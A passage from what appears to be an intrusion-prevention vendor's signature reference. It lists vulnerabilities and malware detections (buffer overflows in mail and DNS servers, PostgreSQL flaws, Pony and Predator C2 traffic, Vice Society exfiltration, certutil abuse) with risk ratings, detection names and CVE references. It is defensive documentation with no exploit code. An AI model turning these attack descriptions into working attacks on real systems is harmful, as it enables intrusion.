The GD graphics library has a buffer overflow vulnerability in the code that handles PNG images. User-supplied rowbytes and height are multiplied together and the result is used as the size of a buffer. By creating a .png image that contains suitable height, width and bitdepth values, remote attackers can execute arbitrary code on a system that opens the image using GD graphics library. PHP is known to use the library to manipulate images.

Situation:

File-PNG_PNG-Image-With-Large-Height-Or-Width-Value

References:

CVE-2004-0990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0990

BID-11523
http://www.securityfocus.com/bid/11523

OSVDB-11190
http://www.osvdb.org/11190

PolarBear-CMS-PHP-File-Upload

About this vulnerability:

A PolarBear CMS PHP File Upload vulnerability

Risk:

High

First detected in:

sgpkg-ips-782-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PolarBear CMS

Type:

Insecure Configuration

Description:

A vulnerability in PolarBear CMS which allows remote attackers to execute arbitrary code by uploading files to a temp directory without authentication via upload.php.

Situation:

HTTP_CRL-PolarBear-CMS-PHP-File-Upload

References:

CVE-2013-0803
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0803

OSVDB-90627
http://www.osvdb.org/90627

Poll-It-Cgi

About this vulnerability:

Poll It CGI variable access

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Poll It CGI

Type:

Code Injection

Description:

Poll It 2.0 has a vulnerability that allows an attacker to set internal variables for a CGI script. This may allow the attacker to access files on the Web server.

References:

CVE-2000-0590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0590

BID-1431
http://www.securityfocus.com/bid/1431

Polycom-Shell-HDX-Series-Traceroute-Command-Execution

About this vulnerability:	A Polycom Shell HDX Series Traceroute Command Execution vulnerability
Risk:	High
First detected in:	sgpkg-ips-1035-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Polycom Shell
Type:	Input Validation
Description:	A vulnerability in Polycom Shell HDX Series wihch allows remote attackers to execute arbitrary payloads with telnet or openssl, through the dev command lan traceroute.
Situation:	Telnet_CS-Polycom-Shell-HDX-Series-Traceroute-Command-Execution

Ponmocup

About this vulnerability:	Ponmocup
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Ponmocup is a Bot that downloads additional malicious content on the infected machine. It can also show unwanted ads for the user.
Situation:	Generic_SS-Ponmocup-Activity HTTP_CSU-Ponmocup-Activity

Pony-Downloader-C2-Traffic

About this vulnerability:	Pony Downloader C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1089-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Pony malware is known to be used as a downloader for additional malware. However, it also has capability to harvest credentials from the infected system.
Situation:	HTTP_CS-Pony-Downloader-C2-Traffic

POP3-Cyrus-IMAP-Server-POP3-User-Command-Buffer-Overflow

About this vulnerability:

POP3 USER command buffer overflow vulnerability in Cyrus IMAP server

Risk:

Moderate

First detected in:

sgpkg-ips-68-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cyrus IMAP Server

Type:

Buffer Overflow

Description:

When the popsubfolders option is enabled, the POP3 server component of Cyrus IMAP server has a buffer overflow vulnerability in the handling of an excessively long user name argument to the USER command. When exploited succesfully, the vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the target system with the privileges of the server process.

Situation:

POP3_User-Command-Buffer-Overflow

References:

CVE-2006-2502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2502

BID-18056
http://www.securityfocus.com/bid/18056

POP3-E-Post-Mail-Server-POP3-Password-Disclosure-Buffer-Overflow

About this vulnerability:

Information disclosure vulnerability in the E-Post Mail Server POP3 service

Risk:

Moderate

First detected in:

sgpkg-ips-157-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

E-Post Mail Server Enterprise; E-Post Mail Server; E-POST EPSTPOP3S.EXE

Type:

Buffer Overflow

Description:

There is an information disclosure vulnerability in the E-Post Mail Server POP3 service. The vulnerability can be exploited by sending multiple APOP commands with a known username in the same session to disclose the password for the username.

Situation:

POP3_E-Post-Mail-Server-POP3-Password-Disclosure-Buffer-Overflow

References:

CVE-2008-2049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2049

BID-28951
http://www.securityfocus.com/bid/28951

OSVDB-44653
http://www.osvdb.org/44653

POP3-MailEnable-POP-Service-Pass-Command-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in MailEnable POP service

Risk:

High

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MailEnable

Type:

Input Validation

Description:

There is a buffer overflow vulnerability in the MailEnable POP service. The vulnerability can be exploited with a very long parameter string to the PASS command. This may lead to denial of service or code execution in the context of the vulnerable service.

Situation:

POP3_MailEnable-POP-Service-Pass-Command-Buffer-Overflow

References:

CVE-2006-6605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6605

BID-21645
http://www.securityfocus.com/bid/21645

POP3-MDaemon-POP3-Server-User-And-Apop-Commands-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of the USER and APOP commands in MDaemon POP3 server

Risk:

High

First detected in:

sgpkg-ips-77-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MDaemon

Type:

Buffer Overflow

Description:

MDaemon POP3 server has a buffer overflow vulnerability in the handling of the user name argument in USER and APOP commands. When exploited succesfully, the vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the target system with the privileges of the server process.

Situation:

POP3_MDaemon-POP3-Server-Apop-Command-Buffer-Overflow
POP3_User-Command-Buffer-Overflow

References:

CVE-2006-4364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4364

BID-19651
http://www.securityfocus.com/bid/19651

OSVDB-28125
http://www.osvdb.org/28125

POP3-Qualcomm-QPopper-BOF

About this vulnerability:

Buffer overflow in Qualcomm QPopper

Risk:

Critical

First detected in:

sgpkg-ips-261-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Qpopper

Type:

Buffer Overflow

Description:

Qualcomm's qpopper prior to version 2.5 contains numerous buffer overflows. An attacker can exploit these to execute arbitrary commands on the system as the superuser.

Situation:

POP3_CS-Generic-Buffer-Overflow-Attack

References:

CVE-1999-0006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0006

BID-133
http://www.securityfocus.com/bid/133

POP3-RevilloC-MailServer-Long-User-Command-Buffer-Overflow

About this vulnerability:

RevilloC MailServer long USER command causes a buffer overflow

Risk:

High

First detected in:

sgpkg-ips-62-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

RevilloC MailServer

Type:

Buffer Overflow

Description:

RevilloC MailServer has a buffer overflow vulnerability in the handling of long arguments to the USER command. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code with the privileges of the server process by sending a crafted USER command.

Situation:

POP3_User-Command-Buffer-Overflow

References:

CVE-2006-1124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1124

BID-16997
http://www.securityfocus.com/bid/16997

OSVDB-23735
http://www.osvdb.org/23735

Popmonster

About this vulnerability:	PopMonster
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	PopMonster
Type:	Misconfiguration
Description:	PopMonster is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Popmonster

Popper_Webmail_Remote_Code_Execution

About this vulnerability:

Popper Webmail Remote Code Execution

Risk:

Low

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Popper Webmail

Type:

Buffer Overflow

Description:

The Popper Webmail software can be tricked into executing arbitary code by providing it with an url from a site that is controlled by the attacker.

Situation:

HTTP_CSU-Popper-Webmail-Remote-Code-Execution

References:

CVE-2005-1870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1870

OSVDB-17085
http://www.osvdb.org/17085

PoPToP-PPTP-Server-Negative-Read-BOF

About this vulnerability:

Buffer overflow in PoPToP PPTP Server allows arbitrary code execution

Risk:

Moderate

First detected in:

sgpkg-ips-13-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

PoPToP PPTP Server

Type:

Buffer Overflow

Description:

PoPToP PPTP Server vulnerable to a buffer overflow, caused by improper bounds checking of the packet's header length by the ctrlpacket.c code. By sending a specially-crafted PPTP packet, a remote attacker could overflow a buffer and cause the system to crash or execute arbitrary code on the server.

Situation:

PPTP_PoPToP-PPTP-Server-Negative-Read-BOF-1
PPTP_PoPToP-PPTP-Server-Negative-Read-BOF-2

References:

CVE-2003-0213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0213

BID-7316
http://www.securityfocus.com/bid/7316

OSVDB-3293
http://www.osvdb.org/3293

Portable-Executable-msstyles-File-Transfer

About this vulnerability:	Possible msstyles file transfer
Risk:	Moderate
First detected in:	sgpkg-ips-1633-5242
Last changed:	sgpkg-ips-1644-5242
Platform:	Windows
Software:	<os>
Type:	Race Condition
Description:	A dynamic link library (DLL) file with contents commonly seen in .msstyles files was seen. If the file originated from an untrusted source, this situation might indicate an attempt to exploit CVE-2023-38146.
Situation:	SMB-TCP_CHS-Microsoft-Windows-Themes-Race-Condition File-Exe_Portable-Executable-msstyles-File-Transfer

Portalscan

About this vulnerability:	PortalScan
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	PortalScan
Type:	Misconfiguration
Description:	PortalScan id an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Portalscan HTTP_CSH-Portalscan

Possible-Cobalt-Strike-Response

About this vulnerability:	A possible response of Cobalt Strike's server was detected
Risk:	High
First detected in:	sgpkg-ips-1270-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	A possible response of Cobalt Strike's server was detected. This might indicate that the system from where the traffic originated is compromised.
Situation:	HTTP_SHS-Possible-Cobalt-Strike-Response

Possible-Malicious-XML-Scriplet

About this vulnerability:	Possible malicious XML scriplet was detected
Risk:	High
First detected in:	sgpkg-ips-1075-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	A scriptlet is a component of Microsoft Windows, which can contain different scripting languages. Scriptlets are also used for malicious activities.
Situation:	File-TextId_Possible-Malicious-XML-Scriplet

Possible-Metasploit-Generated-Malicious-File-Detected

About this vulnerability:	A Possible Metasploit Generated Malicious File Detected
Risk:	High
First detected in:	sgpkg-ips-1078-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Code Injection
Description:	A possible Metasploit generated malicious file has been detected. These files are commonly encoded in base64 and used for code injection to gain a reverse tcp connection with Metasploit.
Situation:	File-Text_Possible-Metasploit-Generated-Malicious-File-Detected

Possible-Vice-Society-PowerShell-Data-Exfiltration-Traffic

About this vulnerability:	Possible Vice Society data exfiltration traffic pattern
Risk:	High
First detected in:	sgpkg-ips-1579-5242
Last changed:	sgpkg-ips-1579-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	A POST request matching to a traffic pattern generated by a known malicious PowerShell script has been detected. This script is used by Vice Society ransomware group to exfiltrate data from the victim host.
Situation:	HTTP_CSU-Possible-Vice-Society-PowerShell-Data-Exfiltration-Traffic

Possibly-Malicious-Certificate-File

About this vulnerability:	Possibly malicious certificate file was detected
Risk:	High
First detected in:	sgpkg-ips-1097-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Malicious actors are using Windows' certutil executable on endpoints after initial infection to download crafted certificate files and converting them to executables that are doing the final infection on the system.
Situation:	File-Text_Possibly-Malicious-Certificate-File

Poster-Software-Publish-It-Pui-File-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in Poster Software PUBLISH-iT

Risk:

Moderate

First detected in:

sgpkg-ips-565-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Poster Software PUBLISH-iT

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Poster Software PUBLISH-iT. The vulnerability is due to insufficient validation on the length of entry names in a "styl" record when processing PUI files. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to open a malicious PUI file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-OLE_Poster-Software-Publish-It-Pui-File-Processing-Buffer-Overflow

References:

CVE-2014-0980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0980

BID-65366
http://www.securityfocus.com/bid/65366

OSVDB-102911
http://www.osvdb.org/102911

Postfix-IPv6-Relaying-Security-Issue

About this vulnerability:

A vulnerability in Postfix

Risk:

Low

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Postfix SMTP Server

Type:

Malfunction

Description:

There is a vulnerability in the way Postfix versions 2.1.3 to 2.1.4-4 handle the relaying of e-mail messages.

Situation:

SMTP_CS-Postfix-IPv6-Relaying-Security-Issue

References:

CVE-2005-0337
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0337

BID-12445
http://www.securityfocus.com/bid/12445

Postfix-SASL-Auth-Handle-Reuse-Memory-Corruption

About this vulnerability:

Attempt to exploit vulnerability in Postfix SMTP Server detected

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Postfix SMTP Server

Type:

Malfunction

Description:

A memory corruption vulnerability exists in the Postfix SMTP server when the Cyrus SASL library is used with authentication mechanisms other than PLAIN, LOGIN and ANONYMOUS. This vulnerability is due to the Postfix server's reuse of a SASL server handle after an authentication failure. This could result in code execution in the context of the process, which is usually run in the context of the user "postfix".

Situation:

SMTP_CS-Postfix-SASL-Auth-Handle-Reuse-Memory-Corruption

References:

CVE-2011-1720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1720

BID-47778
http://www.securityfocus.com/bid/47778

OSVDB-72259
http://www.osvdb.org/72259

PostgreSQL-Bit-Substring-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in the PostgreSQL database server

Risk:

High

First detected in:

sgpkg-ips-290-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

PostgreSQL

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the PostgreSQL database server. A remote authenticated attacker can exploit this vulnerability by sending a crafted SQL query to a vulnerable server to execute arbitrary code or to cause a denial of service condition.

Situation:

Generic_CS-PostgreSQL-Bit-Substring-Buffer-Overflow

References:

CVE-2010-0442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0442

BID-37973
http://www.securityfocus.com/bid/37973

OSVDB-62129
http://www.osvdb.org/62129

PostgreSQL-Database-Core-Server-Non-libpq-Client-Policy-Bypass

About this vulnerability:

A vulnerability in PostgreSQL PostgreSQL

Risk:

High

First detected in:

sgpkg-ips-1128-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PostgreSQL

Type:

Malfunction

Description:

A security policy bypass vulnerability has been reported in the core server component of the PostgreSQL database server. The vulnerability is due to improper authentication of user accounts with empty passwords for clients that do not use libpq. A remote attacker could send maliciously crafted requests to a vulnerable server. A successful exploitation may result in unauthorized access or modification of data between the client and server.

Situation:

Generic_CS-PostgreSQL-Database-Core-Server-Non-libpq-Client-Policy-Bypass

References:

CVE-2017-7546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7546

PostgreSQL-Database-Datetime-Buffer-Overflow

About this vulnerability:

A vulnerability in PostgreSQL PostgreSQL

Risk:

Moderate

First detected in:

sgpkg-ips-569-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PostgreSQL

Type:

Buffer Overflow

Description:

A code execution vulnerability has been found in PostgreSQL database server. The vulnerability is due to a stack buffer overflow when handling the Datetime string. A remote attacker can exploit the vulnerability by sending a malicious request to the target server. Successful exploitation could cause a stack buffer overflow resulting in code execution in the context of the the affected service. Unsuccessful attacks can crash the target service process to cause a denial of service condition.

Situation:

Generic_CS-PostgreSQL-Database-Datetime-Buffer-Overflow

References:

CVE-2014-0063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0063

OSVDB-103547
http://www.osvdb.org/103547

PostgreSQL-Database-Geo_Ops-Path_In-Integer-Overflow

About this vulnerability:

A vulnerability in PostgreSQL PostgreSQL

Risk:

High

First detected in:

sgpkg-ips-570-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PostgreSQL

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been found in PostgreSQL Database. The vulnerability is due to improper validation when processing a large number of points for a geometric data type. A remote authenticated attacker could exploit this vulnerability by sending malicious information to a table in a database. Successful exploitation could cause memory corruption resulting in code execution in the context of the the affected service.

Situation:

Generic_CS-PostgreSQL-Database-Geo_Ops-Path_In-Integer-Overflow

References:

CVE-2014-0064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0064

OSVDB-103548
http://www.osvdb.org/103548

PostgreSQL-Database-Password-Change-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in PostgreSQL Database

Risk:

High

First detected in:

sgpkg-ips-1179-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PostgreSQL

Type:

Buffer Overflow

Description:

A vulnerability in PostgreSQL Database, versions 10.x < 10.9, 11.x < 11.4, 9.4.x < 9.4.23, 9.5.x < 9.5.18, 9.6.x < 9.6.14, which allows remote attackers to execute arbitrary code by sending a crafted request, due to a stack buffer overflow while setting a password.

Situation:

Generic_CS-PostgreSQL-Database-Password-Change-Stack-Buffer-Overflow

References:

CVE-2019-10164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10164

PostgreSQL-Database-Set-Role-Security-Bypass

About this vulnerability:

A vulnerability in PostgreSQL PostgreSQL

Risk:

Moderate

First detected in:

sgpkg-ips-567-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PostgreSQL

Type:

Malfunction

Description:

A policy bypass vulnerability has been found in PostgreSQL database server. The vulnerability is due to a design weakness when granting a role without ADMIN OPTION. A remote attacker can exploit the vulnerability to cause a policy bypass allowing execution of a security-restricted operation or a SECURITY DEFINER function.

Situation:

Generic_CS-PostgreSQL-Database-Set-Role-Security-Bypass

References:

CVE-2014-0060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0060

OSVDB-103544
http://www.osvdb.org/103544

PostgreSQL-Insecure-Library-Mapping-Vulnerability

About this vulnerability:

A remote code execution vulnerability in the PostgreSQL database server

Risk:

High

First detected in:

sgpkg-ips-1108-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

PostgreSQL

Type:

Code Injection

Description:

There is a vulnerability on some default Linux installations of PostgreSQL where the service account is able to write to and source libraries from the /tmp directory, allowing remote execution of arbitrary code.

Situation:

Generic_CS-PostgreSQL-Source-From-Tmp

References:

CVE-2007-3280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3280

Potentially-Malicious-SYLK-File

About this vulnerability:	Potentially malicious SYLK file detected
Risk:	Moderate
First detected in:	sgpkg-ips-1110-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	Symbolic link (SYLK) files are usually used to exchange data between spreadsheets. An attacker can craft a malicious SYLK file and send it to the target user. Opening the file can lead in system compromise.
Situation:	File-Text_Potentially-Malicious-SYLK-File

PowerD-WHATIDO-Format-String

About this vulnerability:

Power Daemon (powerd) format string vulnerability in the WHATIDO variable

Risk:

Moderate

First detected in:

sgpkg-ips-61-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Power Daemon

Type:

Format String

Description:

Power Daemon (powerd) versions 2.0.2 and earlier have a format string vulnerability. A malicious server can supply connecting powerd applications with a crafted WHATIDO command that will lead to arbitrary remote code execution.

Situation:

Generic_PowerD-WHATIDO-Format-String

References:

CVE-2006-0681
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0681

BID-16582
http://www.securityfocus.com/bid/16582

PowerDNS-Authoritative-Server-CVE-2021-36754-DoS

About this vulnerability:

A vulnerability in PowerDNS Authoritative Server.

Risk:

High

First detected in:

sgpkg-ips-1391-5242

Last changed:

sgpkg-ips-1391-5242

Platform:

Linux; Unix

Software:

PowerDNS Authoritative Server

Type:

Malfunction

Description:

A vulnerability in PowerDNS Authoritative Server, version 4.5.0, which allows remote attackers to cause a denial of service condition by sending a crafted packet to the target server, due to an out-of-bounds exception caused by a specific query with QTYPE 65535.

Situation:

DNS-UDP_PowerDNS-Authoritative-Server-CVE-2021-36754-DoS

References:

CVE-2021-36754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36754

PowerDNS-Authoritative-Server-DNS-Packet-Processing-Denial-Of-Service

About this vulnerability:

A vulnerability in PowerDNS PowerDNS Authoritative Server

Risk:

Moderate

First detected in:

sgpkg-ips-710-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PowerDNS Authoritative Server

Type:

Input Validation

Description:

An input validation vulnerability can be exploited by sending a crafted packet that causes the server daemon to crash, which leads to a denial of service condition.

Situation:

DNS-TCP_PowerDNS-Authoritative-Server-Packet-Processing-Denial-Of-Service
DNS-UDP_PowerDNS-Authoritative-Server-Packet-Processing-Denial-Of-Service

References:

CVE-2015-5311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5311

PowerDNS-Authoritative-Server-Dot-Character-Denial-Of-Service

About this vulnerability:

A vulnerability in PowerDNS PowerDNS Authoritative Server

Risk:

Moderate

First detected in:

sgpkg-ips-809-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PowerDNS Authoritative Server

Type:

Resource Starvation

Description:

Dot characters in labels of DNS requests can cause resource exhaustion in PowerDNS Authoritative Server. Large numbers of such request can cause a denial of service condition.

Situation:

DNS-UDP_PowerDNS-Authoritative-Server-Dot-Character-Denial-Of-Service

References:

CVE-2016-5427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5427

PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service

About this vulnerability:

A vulnerability in PowerDNS PowerDNS Recursor

Risk:

High

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PowerDNS Recursor; PowerDNS Authoritative Server

Type:

Malfunction

Description:

A denial of service vulnerability exists in PowerDNS. The vulnerability is due to a design weakness in PowerDNS label decompression code causing excessive looping. A remote attacker can exploit these vulnerabilities by sending a request to a vulnerable server to consume CPU resource. A successful attack could lead to resource exhaustion resulting in a denial of service condition.

Situation:

DNS-TCP_PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service
DNS-UDP_PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service

References:

CVE-2015-1868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1868

PowerDNS-Recursor-Denial-Of-Service

About this vulnerability:

A vulnerability in PowerDNS PowerDNS Recursor

Risk:

Moderate

First detected in:

sgpkg-ips-613-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PowerDNS

Type:

Input Validation

Description:

A denial-of-service vulnerability has been found in PowerDNS Recursor. The vulnerability is due to insufficient validation of DNS queries. A remote, unauthenticated attacker could exploit this vulnerability by sending maliciously crafted DNS queries to a vulnerable server. Successful exploitation would result in a crash of the server process leading to denial of service to legitimate users.

Situation:

DNS-UDP_PowerDNS-Recursor-Denial-Of-Service

References:

CVE-2014-3614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3614

BID-69778
http://www.securityfocus.com/bid/69778

OSVDB-111269
http://www.osvdb.org/111269

PowerShell-In-Office-Document

About this vulnerability:	Powershell references in Microsoft Office files
Risk:	Moderate
First detected in:	sgpkg-ips-1010-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Microsoft Office
Type:	Code Injection
Description:	References to Windows Powershell use may indicate that a document is trying to initiate a stager for malware download.
Situation:	File-Text_PowerShell-In-Office-Document File-OLE_PowerShell-In-Office-Document File-TextId_PowerShell-In-Office-Document

PPLive-Media-Transfer

About this vulnerability:	PPLive media transfer
Risk:	Low
First detected in:	sgpkg-ips-183-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	PPLive
Type:	Streaming Media
Description:	PPLive is an application that is able to play video and audio streams.

PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow

About this vulnerability:

A vulnerability in PPStream ActiveX control

Risk:

High

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

PPStream

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in PPStream ActiveX control.

Situation:

HTTP_SS-PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow
File-Text_PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow

References:

CVE-2007-4748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

BID-25502
http://www.securityfocus.com/bid/25502

OSVDB-38421
http://www.osvdb.org/38421

PPStream-Media-Transfer

About this vulnerability:	PPStream media transfer
Risk:	Low
First detected in:	sgpkg-ips-183-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	PPStream
Type:	Streaming Media
Description:	PPStream is an application that is able to play video and audio streams.
Situation:	Generic_UDP-PPStream-Media-Transfer

PPStream-P2P-Internet-TV

About this vulnerability:	PPStream Internet TV
Risk:	Moderate
First detected in:	sgpkg-ips-183-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PPStream
Type:	Peer-to-Peer
Description:	PPStream is a network for live media streaming. Compared to traditional streaming media, PPStream use p2p type techhnologies, thus you could say that PPStream is a P2P Streaming Internet TV.
Situation:	HTTP_CSH-PPStream-Client-Usage

PPTP-Microsoft-Start-Control-Request-Buffer-Overflow

About this vulnerability:

Buffer overflow in Microsoft's PPTP implementation.

Risk:

Critical

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP0; Windows XP SP1; Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2; Windows 2000 SP3

Software:

<os>

Type:

Buffer Overflow

Description:

A vulnerability exists in Microsoft's PPTP implementation, which can be exploited by sending a specially-crafted packet, allowing the attacker to execute arbitrary commands on the system.

Situation:

PPTP_Malformed-Start-Control-Request

References:

CVE-2002-1214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1214

BID-5807
http://www.securityfocus.com/bid/5807

MS02-063
http://technet.microsoft.com/security/bulletin/MS02-063

Precisionpop

About this vulnerability:	PrecisionPop
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	PrecisionPop
Type:	Misconfiguration
Description:	PrecisionPop is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Precisionpop

Predator-The-Thief-C2-Traffic

About this vulnerability:	Predator The Thief C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1130-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Predator The Thief is an information stealer. It's also capable to execute additional payload on infected system.
Situation:	HTTP_CSU-Predator-The-Thief-C2-Traffic

Printer-Sun-Solaris-Printd-File-Deletion

About this vulnerability:

File deletion vulnerability in the Sun Solaris printd daemon

Risk:

Moderate

First detected in:

sgpkg-ips-63-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

<os>

Type:

Input Validation

Description:

The Sun Solaris printd daemon has a vulnerability in the validation of the 'Unlink data file' command, which is used to delete temporary files related to print jobs . The file argument of this command can refer to any file on the host. A remote attacker is able to use this vulnerability to remove arbitrary files on the vulnerable system.

Situation:

Printer_Sun-Solaris-Printd-File-Deletion-2
Printer_Sun-Solaris-Printd-File-Deletion

References:

CVE-2005-4797
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4797

BID-14510
http://www.securityfocus.com/bid/14510

OSVDB-18650
http://www.osvdb.org/18650

Pro-Server-EX-Denial-Of-Service

About this vulnerability:	A vulnerability in Pro-Server EX allowing denial of service.
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Pro Server EX
Type:	Malfunction
Description:	A vulnerability exists in Pro-Server EX where an attacker can send custom UDP packets exploiting an invalid memory access vulnerability resulting in a denial of service condition.
Situation:	Generic_UDP-Pro-Server-EX-Denial-Of-Service

ProFTP-Banner-Remote-Buffer-Overflow

About this vulnerability:

A ProFTP Banner Remote Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-725-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ProFTP

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in ProFTP version 2.9 which allows remote attackers to execute arbitrary code via a long 220 reply.

Situation:

FTP_SS-ProFTP-Banner-Remote-Buffer-Overflow

References:

CVE-2009-3976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3976

OSVDB-57394
http://www.osvdb.org/57394

ProFTPD-FTP-Server-Telnet-IAC-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in ProFTPD

Risk:

High

First detected in:

